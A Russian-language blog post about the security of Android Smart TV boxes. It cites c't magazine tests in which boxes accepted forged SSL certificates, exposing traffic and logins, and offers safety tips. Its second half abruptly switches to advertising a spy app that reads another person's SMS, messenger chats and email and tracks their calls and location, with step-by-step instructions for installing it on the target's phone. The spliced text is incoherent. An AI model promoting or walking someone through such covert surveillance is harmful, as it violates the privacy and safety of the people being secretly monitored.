Безопасны ли приставки Smart TV на Android?

smarttv

Остановить технический прогресс невозможно, он охватывает всё больше областей нашей повседневной жизни. Подумать только: ещё несколько лет тому назад для выхода в Интернет требовались громоздкие настольные компьютеры, а теперь эта возможность есть и в смартфонах, и в планшетах, и даже в электронных книгах!

Нельзя было обойти и вопрос потокового вещания в режиме онлайн, доступного во многих «умных» телевизорах. Некоторые устройства являются самостоятельным и оригинальным продуктом, а другие используют в качестве основы ОС Android. Но можно ли доверять подобным гаджетам? Насколько хорошо они шифруют информацию? Может ли злоумышленник перехватить данные пользователя? Я постарался разобраться в этом вопросе детальнее.

На эту мысль меня натолкнули исследования немецкого журнала C’T, который изучал безопасность различных Smart TV приставок. Проверяемые модули были от известных брендов: LG, Philips, Samsung и другие. Журналисты издания провели ряд экспериментов, попытались взломать протокол SSL. Именно этот сертификат безопасности является неотъемлемым атрибутом работы защищённого HTTPS соединения. Как оказалось, все приставки совершенно спокойно реагируют на подмену протокола.

Таким образом, исследователи смогли скомпрометировать систему, начать перехватывать трафик от приставки к серверу, а затем и расшифровывать пакеты с информацией! Журналистам даже удалось получить доступ к логинам и паролям, которые ранее вводились в систему. Издание связалось с производителями телевизионных приставок. В ответ они получили обещание исправить все ошибки в будущих релизах прошивок.

В СМИ можно прочитать и о скандалах, связанных со скрытым сбором ресурсов непосредственно производителем Smart TV! Подобные обвинения приводились в адрес LG и Samsung. Собранные данные использовались для формирования базы пользователей. Считается, что это могло применяться при запуске тематической контекстной рекламы. Выходить в открытый Интернет с подобных устройств и вовсе не рекомендуется, особенно если используется не Android, а собственное программное обеспечение.

Ниже привожу основные советы по работе со Smart TV:

  • Не пользуйтесь ресурсами, где требуется вводить личные данные. Например, не посещайте свой аккаунт банковской системы с «умной» приставки, поскольку этот пароль могут перехватить. Пользуйтесь надёжным HTTPS соединением мобильного браузера, либо браузера ПК;
  • Не посещайте незнакомые сайты, закрывайте всплывающие окна и баннеры;
  • Обязательно проверяйте легитимность Smart TV перед использованием приставки. Даже если данный девайс работает на базе Android, в его составе могут присутствовать вредоносные программы. Особенно это касается моделей от безымянных китайских производителей.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.